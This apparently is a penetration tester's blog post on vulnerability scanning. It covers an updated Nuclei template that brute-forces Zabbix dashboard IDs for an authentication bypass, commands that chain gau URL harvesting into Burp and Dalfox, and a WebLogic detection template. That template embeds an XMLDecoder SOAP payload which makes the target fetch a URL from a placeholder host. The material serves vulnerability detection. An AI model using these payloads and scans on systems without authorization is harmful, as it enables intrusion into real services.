A little small tiny contribution to Nuclei templates

 Doing traditional pentest is still fun (the real one, not the one like "You have a vulnerable version of XYZ software and sorry, no evidence of exploitation nor PoC).

One of the latest I got took me to make a small contribution to Nuclei Templates, yes, pure YAML.

A teammate noticed that Zabbix installation in one target was vulnerable to authentication bypass. A well known vulnerability and I wanted to know if there was a template from Nuclei and yes, there was one.  However, Nuclei + this template couldn't find the vulnerability.

CVE-2019-17382.yaml template had a request like this :

requests: - method: GET path: - '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'

Problem is that Dashboards can be deleted and the id will change, I mean, in several installations there is no dashboardid=1, but, maybe equal to 2 or 12 or whatever.

So, the new version of the request makes use of a payload (in this case a file with a list of possible IDs) and changes to a raw request :

requests:

  - payloads:

      ids: helpers/wordlists/numbers.txt

    attack: sniper

    threads: 50

    raw:

      - |

        GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1

        Host: {{Hostname}}

        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0

        Accept-Language: en-US,en;q=0.9

Web Vulnerability Scanning based on URLs from Wayback Machine, OTX, Common Crawler

 [gau + burp | dalfox] GAU : Get complete URLs from site such as wayback machine, common crawler (kinda shoda for URLs) and Allien Vault incidents db.  DALFOX : web vuln scanner, mainly for XSS.

"getallurls (gau) fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain."

GO111MODULE=on go get -u -v github.com/lc/gau

gau -b png,jpg,gif example.com > gau.rpt  <==a bunch of URLS with arguments (if they exist on those providers)

* Chained with Burp :

for url in `cat gau.rpt`; do http --verify no --proxy https:https://127.0.0.1:8080 $url; done

Then, active scan over them (they will appear in site map)

* Chained with Dalfox

GO111MODULE=on go get -v github.com/hahwul/dalfox/v2

cat gau.rpt | dalfox pipe

Back to post : Nuclei vulnerability scanner

Repo :  https://github.com/projectdiscovery/nuclei

Get the binary or compile the source

Download templates :

git clone https://github.com/projectdiscovery/nuclei-templates.git

Nuclei is based on "signatures" from services based on HTTP/HTTPS (Yara rules based)

It's easy to add "rules" or templates to search for other vulnerabilities and get another vulnerability scanner : additional, light and it's part of a new kind of scanners that use same techniques (not everyone uses yaml).

Notice that it targets low hanging fruits.

Adding a template for weblogic :

1. Analized how previous similar vuln was detected (send a xml by GET)

2. Create a template such as this one :

cat nuclei-templates/weblogic.yaml 

id: CVE-2019-2729

info:

  name: WebLogic Deserialization

  author: wcu35745

  severity: high

  #reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2729

  

requests:

  - method: GET

    path:

      - "{{BaseURL}}/wls-wsat/CoordinatorPortType"

    headers:

      Content-Type: text/xml

      SOAPAction: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8" class="java.beans.XMLDecoder"><void id="url" class="java.net.URL"><string>http://%s:%d/cve-2017-10271?target=%s%s</string></void><void idref="url"><void id="stream" method = "openStream" /></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>

    matchers:

      - type: status

        status:

            - 200

      - type: word

        words:

            - "weblogic.wsee.wstx.wsat.v10.endpoint.CoordinatorPortTypePortImpl"

        part: body

3. Words come from the response to the request with the xml SOAP envelope.

4. Put the URLs to scan in a text file (http or https://dns_name_or_IP) or use the -t parameter for single target

5. If found vulnerable, an output such as this one will appear :

./nuclei -l targets.txt -t nuclei-templates/weblogic.yaml -v -timeout 20 -retries 3

                       __     _ 

     ____  __  _______/ /__  (_)

    / __ \/ / / / ___/ / _ \/ / 

   / / / / /_/ / /__/ /  __/ /  

  /_/ /_/\__,_/\___/_/\___/_/   v1   

projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions

[WRN] Developers assume no liability and are not responsible for any misuse or damage.

[INF] [CVE-2019-2729] Loaded template WebLogic Deserialization (@wcu35745) [high]

[CVE-2019-2729] https://ip_address/wls-wsat/CoordinatorPortType   

There is no other indication, only the absence of the previous [status]